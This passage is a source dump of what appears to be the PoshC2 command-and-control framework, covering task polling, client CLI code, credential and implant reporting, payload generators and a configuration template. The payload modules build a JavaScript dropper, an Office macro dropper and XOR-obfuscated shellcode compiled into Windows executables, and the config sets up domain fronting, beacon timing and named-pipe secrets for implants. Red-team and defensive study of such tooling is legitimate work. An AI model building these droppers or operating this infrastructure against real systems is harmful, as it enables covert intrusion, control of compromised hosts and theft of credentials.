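    timestamp = task.get("sent_time") if status == "sent" else task.get("completed_time", "Unknown Time")
    command = task.get("command", "Unknown Command")
    if status == "sent":
        return f"{task_id} sent | Operator: {operator} | Implant: {implant} | Context: {context} | {timestamp}\n{command}\n"
    if status == "returned":
        # NOTE(review): output originates on the implant host and is printed
        # verbatim, so embedded terminal control sequences reach the operator's
        # terminal unfiltered. Consider stripping control characters here.
        return f"{task_id} returned | Operator: {operator} | Implant: {implant} | Context: {context} | {timestamp}\n\n{output}\n"
    return ""


def poll_new_tasks(latest_task_id):
    """Continuously poll for new tasks.

    Walks task ids upward from ``latest_task_id + 1``. An id is re-polled every
    POLL_INTERVAL seconds until get_task_by_id returns it (exists and has
    completed); tasks belonging to other operators are skipped silently.
    Never returns.
    """
    current_id = latest_task_id
    while True:
        candidate_id = current_id + 1
        task = get_task_by_id(candidate_id)
        if task is None:
            # Nothing completed at this id yet: wait, then ask for the same id again.
            time.sleep(POLL_INTERVAL)
            continue
        current_id = candidate_id
        # Check if the task belongs to the specified username
        if task.get("user") != FILTER_USERNAME:
            continue
        print(format_task(task, "sent"))
        if task.get("output"):  # If task is completed and has output
            print(format_task(task, "returned"))


if __name__ == "__main__":
    print(f"Fetching latest task ID for user '{FILTER_USERNAME}'...")
    latest_task_id = get_latest_task_id()
    print(f"Starting polling from task ID: {latest_task_id + 1}")
    poll_new_tasks(latest_task_id)
--------------------------------------------------------------------------------
/poshc2/__init__.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
"""Package root: version/banner discovery and the --server/--client dispatcher."""

import subprocess
import sys

try:
    # Nearest v* tag reachable from HEAD. A tree unpacked from a zip has no
    # .git and git exits non-zero (CalledProcessError); a host without git
    # raises OSError instead, which the original did not catch and therefore
    # failed at import time. Both now fall back to the "Zip" label.
    VERSION = subprocess.check_output(
        ["git", "describe", "--match", "v[0-9]*", "--abbrev=0", "--tags", "HEAD"]).decode().strip()
except (subprocess.CalledProcessError, OSError):
    VERSION = "Zip"


class Colours:
    """ANSI colour escape sequences used for console output."""
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    RED = '\033[91m'
    END = '\033[0m'
    YELLOW = '\033[93m'
    PURPLE = '\033[1;35m'


# NOTE: the column alignment of this ASCII art was lost in the copy this file
# was rebuilt from; only the characters are preserved.
logo = Colours.GREEN + r"""
_________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \\
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \\
|____| \____/____ >___| / \______ /\_______ \\
\/ \/ \/ \/
"""

try:
    # "%h %ci" gives the short hash and the committer date; [:-6] drops the
    # trailing " +HHMM" timezone offset, strip("'") the quotes from --format.
    commit = subprocess.check_output(["git", "log", "-1", "--format='%h %ci'"]).decode().strip('\n').strip("'")[:-6]
    banner = Colours.GREEN + fr"""==== {Colours.RED}PoshC2 {VERSION} ({commit}){Colours.GREEN} ====
"""
except Exception:
    # Any failure (no git, no repository, decode error) means a banner without
    # the commit stamp; the banner must never block start-up.
    banner = Colours.GREEN + fr"""==== {Colours.RED}PoshC2 {VERSION}{Colours.GREEN} ====
"""

logo = logo + banner


def run():
    """Dispatch to the client or server entry point based on ``sys.argv[1]``.

    Invoking with no arguments used to raise IndexError; it now reaches the
    same "unrecognised arguments" message as any other bad first argument.
    """
    mode = sys.argv[1] if len(sys.argv) > 1 else None
    if mode == '--client':
        import poshc2.client as client
        client.start()
    elif mode == '--server':
        import poshc2.server as server
        server.start()
    else:
        print(f"Unrecognised startup arguments, expected --server/--client as first arg: {str(sys.argv)}")
--------------------------------------------------------------------------------
/poshc2/client/Opsec.py:
--------------------------------------------------------------------------------
# Powershell Implant
# Command names consulted by the client's opsec checks for the PowerShell
# implant; how a typed command is matched against them is decided by the
# consumer of this list (presumably a prefix/substring check — confirm).
ps_opsec = ["whoami", "net", "netstat", "ipconfig", "powershell", "netsh", "invoke-shellcode", "nltest", "cmd"]
--------------------------------------------------------------------------------
/poshc2/client/__init__.py:
--------------------------------------------------------------------------------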
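#!/usr/bin/env python3
# ---- /poshc2/client/__init__.py ----
import os
import sys


def start():
    """Launch the interactive PoshC2 client.

    Called for ``start.py --client``: removes the launcher's own tokens
    (``--client`` and the ``start.py`` script entry) from ``sys.argv`` and
    hands the remaining arguments to ``ImplantHandler.main``.  The import is
    deferred so that importing this package does not load the whole client.

    Raises:
        ValueError: if ``--client`` or the ``start.py`` entry is not present
            in ``sys.argv``.
    """
    from poshc2.client.command_handlers.ImplantHandler import main

    # sys.argv is trimmed in place (as before), so later readers see the same list.
    args = sys.argv
    args.remove("--client")
    # argv[0] may be a bare "start.py" or a full path to it depending on how
    # the launcher was invoked; match on the basename so both forms work.
    script = next((a for a in args if os.path.basename(a) == "start.py"), None)
    if script is None:
        raise ValueError("start.py not found in sys.argv")
    args.remove(script)
    main(args)


# ---- /poshc2/client/cli/AutosuggestionAggregator.py ----
from typing import Optional

from prompt_toolkit.auto_suggest import Suggestion, AutoSuggest
from prompt_toolkit.document import Document


class AutosuggestionAggregator(AutoSuggest):
    """Combine several ``AutoSuggest`` providers into one.

    ``suggestors`` is consulted in list order; the first provider that returns
    a non-empty suggestion wins and the remaining providers are not queried.
    """

    def __init__(self, suggestors):
        # Stored as given (no copy) so the caller may keep mutating the list.
        self.suggestors = suggestors

    def get_suggestion(self, buffer: "Buffer", document: Document) -> Optional[Suggestion]:
        """Return the first non-empty suggestion from the providers, else ``None``."""
        candidates = (provider.get_suggestion(buffer, document) for provider in self.suggestors)
        return next((candidate for candidate in candidates if candidate), None)


# ---- /poshc2/client/cli/CommandPromptCompleter.py ----
import glob
import re
from typing import Callable, Dict, Iterable, List, Optional, Union

from prompt_toolkit.completion import WordCompleter, Completer, CompleteEvent, Completion
from prompt_toolkit.document import Document

# Completion is only offered while the buffer holds a single token (no
# internal whitespace), i.e. while the user is still typing the command word.
_SINGLE_TOKEN = re.compile(r"^\S*$")


def _is_single_token(document: Document) -> bool:
    """True when the stripped buffer text contains no whitespace."""
    return _SINGLE_TOKEN.match(document.text.strip()) is not None


class FirstWordCompleter(Completer):
    """Complete the first word of the buffer from a fixed or lazily supplied word list.

    ``words`` may be a list of strings or a zero-argument callable returning
    one, mirroring ``WordCompleter``.  A callable is re-evaluated on each
    completion request so the word list can change at runtime (the original
    declared this type but crashed on a callable with ``sorted(set(callable))``).
    ``meta_dict`` is kept for parity with ``WordCompleter`` but is not used here.
    """

    def __init__(self, words: Union[List[str], Callable[[], List[str]]], meta_dict: Optional[Dict[str, str]] = None, WORD: bool = False) -> None:
        if callable(words):
            # De-duplicate and sort lazily, exactly as the list form is treated.
            self.words = lambda: sorted(set(words()))
        else:
            self.words = sorted(set(words))
        self.meta_dict = meta_dict or {}
        self.WORD = WORD
        self.word_completer = WordCompleter(words=self.words, WORD=self.WORD)

    def get_completions(self, document: Document, complete_event: CompleteEvent) -> Iterable[Completion]:
        """Delegate to ``WordCompleter`` while a single token is being typed, else nothing."""
        if not _is_single_token(document):
            return []
        return self.word_completer.get_completions(document, complete_event)


class FilePathCompleter(Completer):
    """Complete a filename relative to ``path`` using a glob suffix.

    The buffer text is appended to ``path`` and the pattern
    ``<path><text><glob>`` is expanded; the ``path`` prefix is then stripped
    from each match so the completion inserts a name relative to ``path``.
    """

    def __init__(self, path, glob="*", meta_dict: Optional[Dict[str, str]] = None, WORD: bool = False) -> None:
        # NOTE: ``glob`` was previously written as ``glob: '*'`` -- an
        # annotation, not a default -- which made the argument mandatory.
        # It now defaults to "*".  The parameter shadows the ``glob`` module
        # inside __init__ only; get_completions uses the module.
        self.meta_dict = meta_dict or {}
        self.WORD = WORD
        self.path = path if path.endswith("/") else path + "/"
        self.glob = glob

    def get_completions(self, document: Document, complete_event: CompleteEvent) -> Iterable[Completion]:
        """Expand the glob for the typed prefix and offer the relative names."""
        if not _is_single_token(document):
            return []
        typed = document.text.strip()
        # Operator-controlled local input: no traversal guard is applied, so
        # "../" is honoured relative to ``path`` (unchanged from the original).
        matches = [match.replace(self.path, "") for match in glob.glob(self.path + typed + self.glob)]
        return WordCompleter(words=sorted(matches), WORD=self.WORD).get_completions(document, complete_event)


# ---- /poshc2/client/cli/PoshExamplesAutosuggestions.py ----
from typing import Optional

from prompt_toolkit.auto_suggest import Suggestion, AutoSuggest
from prompt_toolkit.document import Document


class AutoSuggestFromPoshExamples(AutoSuggest):
    """Suggest the remainder of the first help-text example that the buffer is a prefix of."""

    def __init__(self, examples):
        self.examples = examples

    def get_suggestion(self, buffer: "Buffer", document: Document) -> Optional[Suggestion]:
        """Return the unfinished tail of the first matching example, or ``None``.

        Leading whitespace in the buffer is ignored for matching and the tail
        is taken after the *matched* prefix.  The original matched on the
        stripped text but sliced with the unstripped length, so any surrounding
        whitespace in the buffer dropped or duplicated characters.  An empty
        buffer still matches (and suggests) the first example.
        """
        prefix = document.text.lstrip()
        for example in self.examples:
            if example.startswith(prefix):
                return Suggestion(example[len(prefix):])
        return None


# ---- /poshc2/client/command_handlers/CommandTags.py ----
from enum import Enum, unique


@unique
class Tag(Enum):
    """Categories used to group client commands in help output.

    Values are distinct sequential ints.  The original assigned values with
    stray trailing commas (``Opsec = 8,`` / ``Privilege_Escalation = 8,``), which
    made ``Privilege_Escalation`` an *alias* of ``Opsec`` (same tuple value) and
    its friendly name "Opsec"; ``@unique`` now rejects any such collision.
    Only ``.name`` is relied on by ``get_friendly_name``; the numeric values
    changed from the original tuples -- TODO(review): confirm nothing persists
    ``Tag.value``.
    """
    Filesystem = 0
    Injection = 1
    Lateral_Movement = 2
    Util = 3
    SOCKS = 4
    Data_Gathering = 5
    Credential_Harvesting = 6
    Comms = 7
    Help = 8
    Opsec = 9
    Privilege_Escalation = 10
    Process_Manipulation = 11
    Memory_Manipulation = 12
    RDP = 13
    WMI = 14
    Enumeration = 15
    SQL = 16
    Collection = 17
    Azure_AD = 18
    Registry = 19
    Web = 20
    Core = 21
    PBind = 22

    def get_friendly_name(self):
        """Return the member name with underscores replaced by spaces."""
        return self.name.replace("_", " ")


# ---- /poshc2/client/reporting/CSV.py (continues below) ----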
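#!/usr/bin/env python3
# ---- /poshc2/client/reporting/CSV.py ----

from poshc2.server.Config import ReportsDirectory
from poshc2.server.Core import print_bad
from poshc2.server.database.Model import Task, MitreTTP
from poshc2.server.database.Helpers import get_data_frame, get_implant, get_task


def _implant_context(implant):
    """Return the ``DOMAIN\\user @ hostname`` label reports use for an implant."""
    return implant.domain + "\\" + implant.user + " @ " + implant.hostname


def generate_csv(table):
    """Write one CSV report for ``table`` into ``ReportsDirectory``.

    ``table`` is a database model class; the output path is
    ``{ReportsDirectory}{table.__tablename__}.csv`` and is printed on success.
    For ``Task`` rows the numeric ``implant_id`` column is replaced with the
    implant's context label; for ``MitreTTP`` rows the ``context``,
    ``timestamp`` and ``command`` columns are filled from the linked task and
    its implant and the raw ``task_id`` column is dropped.

    Frames come from ``get_data_frame`` (pandas) and are written with
    ``DataFrame.to_csv``.  Some tables export secrets verbatim (see
    ``ReportKeys``: encryption keys, proxy passwords, bot tokens), so the
    reports directory must be treated as sensitive.
    """
    frame = get_data_frame(table)

    if table == Task:
        for index, row in frame.iterrows():
            # Column 1 of the Task frame is assumed to be implant_id -- TODO
            # confirm against Model.  ``.iloc`` keeps the positional access the
            # original used without pandas' deprecation of integer keys.
            implant = get_implant(row.iloc[1])
            try:
                if frame.loc[index, "implant_id"]:
                    frame.loc[index, "implant_id"] = _implant_context(implant)
            except (AttributeError, KeyError, TypeError, ValueError):
                # get_implant() returned nothing usable (e.g. None).  The
                # original retried the identical statement once inside a bare
                # except, which cannot succeed and hid every error type.
                print_bad("Cannot translate implant_id")
    elif table == MitreTTP:
        for index, row in frame.iterrows():
            task = get_task(row.iloc[4])  # column 4 assumed to be task_id -- TODO confirm
            implant = get_implant(task.implant_id)
            frame.loc[index, "context"] = _implant_context(implant)
            frame.loc[index, "timestamp"] = task.completed_time
            frame.loc[index, "command"] = task.command
        del frame["task_id"]

    csv_report_name = f"{ReportsDirectory}{table.__tablename__}.csv"
    # to_csv opens and closes the file itself; the original left a handle open.
    frame.to_csv(csv_report_name, index=False, encoding="utf-8")
    print(f" {csv_report_name}")


# ---- /poshc2/client/reporting/ReportKeys.py ----
from enum import Enum


class ReportKeys(Enum):
    """Column lists, per report, in the order the HTML/CSV reporters emit them.

    NOTE: ``c2_server``, ``implants`` and ``urls`` include secrets
    (``encryption_key``, ``proxy_password``, ``slack_bot_token``,
    ``pushover_api_token``) and ``creds`` is harvested credential material;
    generated reports are as sensitive as the database itself.
    """
    tasks = ['id', 'context', 'command', 'output', 'user', 'sent_time', 'completed_time', 'implant_id']

    c2_server = ['id', 'payload_comms_host', 'encryption_key', 'domain_front_header', 'default_sleep', 'kill_date', 'get_404_response',
                 'posh_project_directory', 'hosted_file_url', 'download_url', 'proxy_url', 'proxy_username', 'proxy_password', 'urls',
                 'socks_urls', 'insecure', 'user_agent', 'referer', 'pushover_api_token', 'pushover_api_user', 'slack_user_id',
                 'slack_channel', 'slack_bot_token', 'notifications_enabled']

    creds = ['id', 'domain', 'username', 'password', 'hash']

    implants = ['numeric_id', 'implant_id', 'url_id', 'context', 'ip_address', 'encryption_key', 'first_seen', 'last_seen',
                'process_id', 'process_name', 'architecture', 'alive', 'sleep', 'loaded_modules', 'type', 'label']

    urls = ['id', 'name', 'url', 'host_header', 'proxy_url', 'proxy_username', 'proxy_password', 'credential_expiry']

    opsec_entries = ['id', 'date', 'owner', 'event', 'note']

    mitre_ttps = ['id', 'technique_id', 'technique_name', 'tactics', 'context', 'timestamp', 'command']


# ---- /poshc2/server/Cert.py ----
import os
from os.path import exists, join

from OpenSSL import crypto

from poshc2.server.Config import Cert_C, Cert_ST, Cert_L, Cert_O, Cert_OU, Cert_CN, Cert_SerialNumber, Cert_NotBefore, Cert_NotAfter

CERT_FILE = "posh.crt"
KEY_FILE = "posh.key"


def create_self_signed_cert(cert_dir):
    """Create ``posh.crt``/``posh.key`` in ``cert_dir`` unless both already exist.

    The certificate is self-signed (issuer == subject) with subject fields,
    serial number and validity window taken from Config, a fresh 2048-bit RSA
    key and a SHA-256 signature.  The original signed with SHA-1, which
    current TLS clients and OpenSSL's default security level reject.  If either
    file is missing both are regenerated.  The private key is written with
    mode 0600 instead of whatever the process umask allows.

    Requires pyOpenSSL (``pip install pyopenssl``).
    """
    cert_path = join(cert_dir, CERT_FILE)
    key_path = join(cert_dir, KEY_FILE)
    if exists(cert_path) and exists(key_path):
        return

    key = crypto.PKey()
    key.generate_key(crypto.TYPE_RSA, 2048)

    cert = crypto.X509()
    subject = cert.get_subject()
    subject.C = Cert_C
    subject.ST = Cert_ST
    subject.L = Cert_L
    subject.O = Cert_O
    subject.OU = Cert_OU
    subject.CN = Cert_CN
    cert.set_serial_number(Cert_SerialNumber)
    cert.gmtime_adj_notBefore(Cert_NotBefore)
    cert.gmtime_adj_notAfter(Cert_NotAfter)
    cert.set_issuer(cert.get_subject())
    cert.set_pubkey(key)
    cert.sign(key, "sha256")

    with open(cert_path, "wb") as cert_file:
        cert_file.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
    # Create the key owner-readable only; chmod afterwards covers the case where
    # an old key file with looser permissions is being overwritten.
    key_fd = os.open(key_path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(key_fd, "wb") as key_file:
        key_file.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
    os.chmod(key_path, 0o600)


# ---- /poshc2/server/__init__.py ----
#!/usr/bin/env python3

import os
import sys


def start():
    """Launch the PoshC2 server.

    Called for ``start.py --server``: removes the launcher's own tokens
    (``--server`` and the ``start.py`` script entry) from ``sys.argv`` and
    hands the remaining arguments to ``C2Server.main``.  The import is deferred
    so importing the package does not start the server's dependencies.

    Raises:
        ValueError: if ``--server`` or the ``start.py`` entry is not present
            in ``sys.argv``.
    """
    from poshc2.server.C2Server import main

    args = sys.argv
    args.remove("--server")
    # argv[0] may be a bare "start.py" or a full path to it; match the basename.
    script = next((a for a in args if os.path.basename(a) == "start.py"), None)
    if script is None:
        raise ValueError("start.py not found in sys.argv")
    args.remove(script)
    main(args)


# ---- /poshc2/server/database/__init__.py ----
#!/usr/bin/env python3

from poshc2.server.Config import Database
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.ext.declarative import declarative_base

# ``check_same_thread`` is a sqlite3 connect() argument; psycopg2 rejects
# unknown keyword arguments, so it is passed only for SQLite URLs
# (PostgreSQL is a supported DatabaseType in config-template.yml).
_connect_args = {"check_same_thread": False} if str(Database).lower().startswith("sqlite") else {}
database_engine = create_engine(Database, connect_args=_connect_args, echo=False)  # set echo=True to get database debug output
Base = declarative_base()

# Model must be imported after Base exists (its classes subclass Base) and
# before create_all() so every table is registered on Base.metadata.
from .Model import *  # noqa: E402,F401,F403

Base.metadata.create_all(database_engine)
session_factory = sessionmaker(bind=database_engine)
Session = scoped_session(session_factory)


# ---- /poshc2/server/payloads/JS-Payloads.py ----
from poshc2 import Colours
from poshc2.server.Config import PayloadTemplatesDirectory


def create_payloads(payloads, name):
    """Write the JavaScript dropper for this payload set.

    The ``dropper.js`` template is copied verbatim from
    ``PayloadTemplatesDirectory`` -- no placeholder substitution happens
    (TODO(review): the original carried the same observation; confirm whether
    the template is meant to be edited).  The output file is
    ``{output_directory}{name}Launcher.js``, the path that is logged and the
    ``{name}`` prefix every other payload writer uses; the original logged
    that path but actually wrote ``Launcher.js``.
    """
    payloads.quickstart_log(Colours.END)
    payloads.quickstart_log("JS files:")

    with open(f"{PayloadTemplatesDirectory}dropper.js", "r") as template:
        dropper = template.read()

    filename = f"{payloads.output_directory}{name}Launcher.js"
    with open(filename, "w") as output_file:
        output_file.write(dropper)
    payloads.quickstart_log(f"JS Payload written to: {filename}")


# ---- /poshc2/server/payloads/Macro-Payloads.py ----
from poshc2 import Colours
from poshc2.Utils import format_macro
from poshc2.server.Config import PayloadTemplatesDirectory


def create_payloads(payloads, name):
    """Write the Office macro payload ``{output_directory}{name}macro.txt``.

    The raw base payload (``payloads.create_raw_base()``) is rendered as a VBA
    string via ``format_macro`` and substituted for ``#REPLACEME#`` in the
    ``dropper.macro`` template.
    """
    payloads.quickstart_log(Colours.END)
    output_path = f"{payloads.output_directory}{name}macro.txt"
    payloads.quickstart_log(f"Macro Payload written to: {output_path}")

    macro_string = format_macro("str", str(payloads.create_raw_base()))
    with open(f"{PayloadTemplatesDirectory}dropper.macro", "r") as template:
        content = template.read().replace("#REPLACEME#", macro_string)

    with open(output_path, "w") as output_file:
        output_file.write(content)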
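# ---- /poshc2/server/payloads/XOR-Payloads.py ----
import subprocess

from poshc2.server.Config import PayloadTemplatesDirectory, XOR_KEY
from poshc2.server.payloads.Payloads import PayloadType

# Cross-compilers used to build the Windows EXE for each architecture.
_COMPILERS = {
    "x64": "x86_64-w64-mingw32-gcc",
    "x86": "i686-w64-mingw32-gcc",
}


def _to_bytes(value):
    """Coerce ``value`` (bytes, bytearray, list of ints or str) to ``bytes``.

    A ``str`` is UTF-8 encoded so a key taken straight from the YAML config
    works as well as one already converted to bytes elsewhere.
    """
    if isinstance(value, str):
        return value.encode("utf-8")
    return bytes(value)


def xor(data, key):
    """XOR each byte of ``data`` with the repeating ``key``.

    Returns a list of ints (0-255), one per input byte, as the original did.
    This is obfuscation to hide the shellcode at rest, not encryption: the
    key is embedded next to the ciphertext in the generated dropper.

    Raises:
        ValueError: if ``key`` is empty (the original raised ZeroDivisionError).
    """
    key_bytes = _to_bytes(key)
    if not key_bytes:
        raise ValueError("XOR key must not be empty")
    key_len = len(key_bytes)
    return [byte ^ key_bytes[i % key_len] for i, byte in enumerate(_to_bytes(data))]


def c_char_arr(name, value):
    """Render ``value`` as a C ``char`` array initialiser: ``char NAME[]={0x..,0x..};``.

    The output format is byte-for-byte what ``dropper.xor`` expects.
    """
    hex_bytes = ",0x".join(format(b, "x") for b in _to_bytes(value))
    return "char " + name + "[]={0x" + hex_bytes + "};"


def generate_xor_dropper(payloads, name, arch, payloadtype):
    """Build the XOR-obfuscated C dropper and EXE for one (payload type, arch).

    Reads ``{output_directory}{name}{payloadtype}_{arch}_Shellcode.bin``,
    XORs it with ``XOR_KEY``, substitutes ``#REPLACEME#`` and
    ``#REPLACE_XOR_KEY#`` in the ``dropper.xor`` template, writes
    ``..._xor.c`` and compiles it to ``..._xor.exe`` with the mingw-w64 cross
    compiler for ``arch``.  An unknown ``arch`` is logged and the function
    returns after writing the C source, as before.

    Raises:
        FileNotFoundError: if the shellcode file, template or compiler is missing.
        subprocess.CalledProcessError: if the compiler exits non-zero.
    """
    base = f"{payloads.output_directory}{name}{payloadtype}_{arch}"
    source_path = f"{base}_xor.c"
    exe_path = f"{base}_xor.exe"

    with open(f"{base}_Shellcode.bin", "rb") as shellcode_file:
        shellcode_source = shellcode_file.read()

    shellcode = c_char_arr("sc", xor(shellcode_source, XOR_KEY))

    with open(f"{PayloadTemplatesDirectory}dropper.xor", "r") as template:
        content = template.read()
    content = content.replace("#REPLACEME#", shellcode).replace("#REPLACE_XOR_KEY#", c_char_arr("key", XOR_KEY))

    with open(source_path, "w") as source_file:
        source_file.write(content)
    payloads.quickstart_log(f"XORed shellcode source written to: {source_path}")

    compiler = _COMPILERS.get(arch)
    if compiler is None:
        payloads.quickstart_log("ERROR: verify the architecture")
        return

    # Argument list, no shell: the output directory and payload name are
    # interpolated into the command line, and the original shell string broke
    # on (or interpreted) spaces and shell metacharacters in either.
    subprocess.check_output([compiler, "-s", "-w", source_path, "-o", exe_path])

    payloads.quickstart_log(f"XORed EXE payload written to: {exe_path}")


def create_payloads(payloads, name):
    """Generate the XOR droppers for every ``PayloadType`` on x86 and x64."""
    for arch in ("x86", "x64"):
        for payloadtype in PayloadType:
            generate_xor_dropper(payloads, name, arch, payloadtype.value)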
/resources/beacon-data/fb.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/fb.jpg -------------------------------------------------------------------------------- /resources/beacon-data/fg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/fg.png -------------------------------------------------------------------------------- /resources/beacon-data/i.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/i.png -------------------------------------------------------------------------------- /resources/beacon-data/in.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/in.png -------------------------------------------------------------------------------- /resources/beacon-data/paw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/paw.png -------------------------------------------------------------------------------- /resources/beacon-data/pn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/pn.png -------------------------------------------------------------------------------- /resources/beacon-data/we.gif: -------------------------------------------------------------------------------- 
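# /resources/config-template.yml
# These options are loaded into the database on first run; changing them after
# that must be done through commands (such as set-defaultbeacon), or by
# creating a new project.

# =====================================================
# CONFIG YOU HAVE TO SET
# =====================================================

ProjectName: "Public-Project" # for pipelines
UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36" # need to manually specify UserAgent, default is not an option. This sample string is old and is a fingerprint in its own right; use one that matches the target environment.
KillDate: "2999-01-01" # yyyy-MM-dd. The sample value never expires; set the real end of the engagement so implants stop on their own.
NotificationsProjectName: "PoshC2"

# Payload comms urls, will failover in order listed here. All need to be the same protocol (http/https).
# Format -> Connect-url: host header e.g.
# - https://frontable.com: endpoint.cdn.com
# - "https://direct.com:8080": ""
PayloadComms:
  - "https://127.0.0.1": ""

# =====================================================
# OPTIONAL CONFIG
# =====================================================

# Server Config
BindIP: '0.0.0.0' # listens on every interface; bind to a specific address or firewall the port if the C2 is not meant to be reachable from everywhere
BindPort: 443

# Database Config
DatabaseType: "SQLite" # or PostgreSQL
PostgresConnectionString: "dbname='poshc2_project_x' port='5432' user='admin' host='192.168.111.111' password='XXXXXXX'" # Only used if PostgreSQL in use. Contains a plaintext password: keep the filled-in config out of version control.

# Pipeline Options
PipelineEnabled: False

# Comms Options
Referer: "" # optional
ServerHeader: "Apache"
DefaultSleep: "5s"
Jitter: 0.20
UrlConfig: "urls" # Beacon URLs will be taken from resources/urls.txt if value is 'urls'. If value is 'wordlists' beacon URLs will be randomly generated on server creation from resources/wordlist.txt

# Payload Options
PayloadStageRetries: true
PayloadStageRetriesInitialWait: 60 # Stager will retry after this many seconds, doubling the wait each time if it fails
PayloadStageRetriesLimit: 30 # Stager retry attempts before failing
PayloadDomainCheck: "" # If non-empty then the UserDomain on the target will be checked and if it 'contains' this value then the payload will execute, else it will not.

# Notifications Options
EnableNotifications: "No"

# Slack - https://slack.com/
Slack_BotToken: "" # The token used by the application to authenticate. Get it from https://[YourSlackName].slack.com/apps/A0F7YS25R (swap out [YourSlackName]). Should start with xoxb-.
Slack_UserID: "" # Found under a user's profile (e.g. UHEJYT2AA). Can also be "channel".
Slack_Channel: "" # e.g. #bots

# PBind Options
# These defaults are published with the project, so defenders can match on them;
# change both per engagement.
PBindPipeName: "jaccdpqnvbrrxlaf"
PBindSecret: "mtkn4"

# FComm Options
FCommFilePath: "C:\\Users\\Public\\Public.ost"

# Pipelines
JenkinsServer: "https://jenkins.pipelines.local"
JenkinsKey: ""
NexusServer: "https://nexus.pipelines.local"
NexusKey: ""

# Pushover - https://pushover.net/
Pushover_APIToken: ""
Pushover_APIUser: ""

# SOCKS Proxying Options
SocksHost: "https://0.0.0.0:49031" # The host the C2 http requests communicate with - not the port the SOCKS client connects to. Most cases should be left like this and set in rewrite rules.

# XOR key
# Replace the placeholder. The key is compiled into the XOR dropper alongside the
# shellcode, so this is obfuscation of the payload at rest, not encryption.
XOR_KEY: "random_alphanum_key_goes_here"

# ---- /resources/html-templates/autoruns.html (continues below) ----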
3 |
4 |
Autoruns
5 |
6 |
7 |
8 | Add new autorun task: 9 |
10 | 11 |
12 | 13 |
14 |
15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | {% for autorun in autoruns %} 25 | 26 | 27 | 28 | 35 | 36 | {% endfor %} 37 |
#TASKACTION
{{autorun.id}}{{autorun.task}} 29 | 30 | 33 | 34 |
38 |
39 |
40 | -------------------------------------------------------------------------------- /resources/html-templates/components/autocomplete.html: -------------------------------------------------------------------------------- 1 |
    2 | {% for cmd in commands%} 3 |
  • {{cmd}}
  • 4 | {% endfor %} 5 |
6 | 7 | 15 | -------------------------------------------------------------------------------- /resources/html-templates/components/c2_message_logs.html: -------------------------------------------------------------------------------- 1 | {% autoescape true %} 2 |
3 | {% for c2messages in c2messages %} 4 |

> {{ c2messages.message |replace("[94m","") | replace("[0m","") | replace("", "") }}

5 | {% endfor %} 6 |
7 | {% endautoescape %} 8 | -------------------------------------------------------------------------------- /resources/html-templates/components/commands_form.html: -------------------------------------------------------------------------------- 1 | 23 | -------------------------------------------------------------------------------- /resources/html-templates/components/implants_table.html: -------------------------------------------------------------------------------- 1 | {%if implants|length > 0 %} 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 16 | 17 | {% for implant in implants %} 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 35 | 36 | {% endfor %} 37 |
#Last seenProcess nameProcess IDSleepUsername@machineArchitectureImplant typeLabelAction 15 |
{{implant.numeric_id}}{{implant.last_seen}}{{implant.process_name}}{{implant.process_id}}{{implant.sleep}}{{implant.domain}}\{{implant.user}}@{{implant.hostname}}{{implant.architecture}}{{implant.type}}{{implant.label}} 29 | 30 | 33 | 34 |
38 | {% else %} 39 |
There are no active implants yet
40 | {%endif %} 41 | 42 | 88 | -------------------------------------------------------------------------------- /resources/html-templates/home.html: -------------------------------------------------------------------------------- 1 | {% include "header.html" %} 2 |
3 |
4 |
5 |
Simple API Interface
6 | 7 |
8 |
9 |

10 | Lorem ipsum, dolor sit amet consectetur adipisicing elit. Amet laborum nostrum nulla, similique quibusdam 11 | tempore eius quas aliquam magni illo aspernatur reiciendis consectetur at ut dignissimos. Beatae corrupti ut 12 | labore? 13 |

14 | 30 |
31 |
32 |
33 | 34 | 55 | -------------------------------------------------------------------------------- /resources/html-templates/include/css/fonts/bootstrap-icons.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/html-templates/include/css/fonts/bootstrap-icons.woff -------------------------------------------------------------------------------- /resources/html-templates/include/css/fonts/bootstrap-icons.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/html-templates/include/css/fonts/bootstrap-icons.woff2 -------------------------------------------------------------------------------- /resources/html-templates/include/img/logo-for-dark.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/html-templates/include/img/logo-for-dark.webp -------------------------------------------------------------------------------- /resources/html-templates/include/img/logo-for-light.webp: -------------------------------------------------------------------------------- 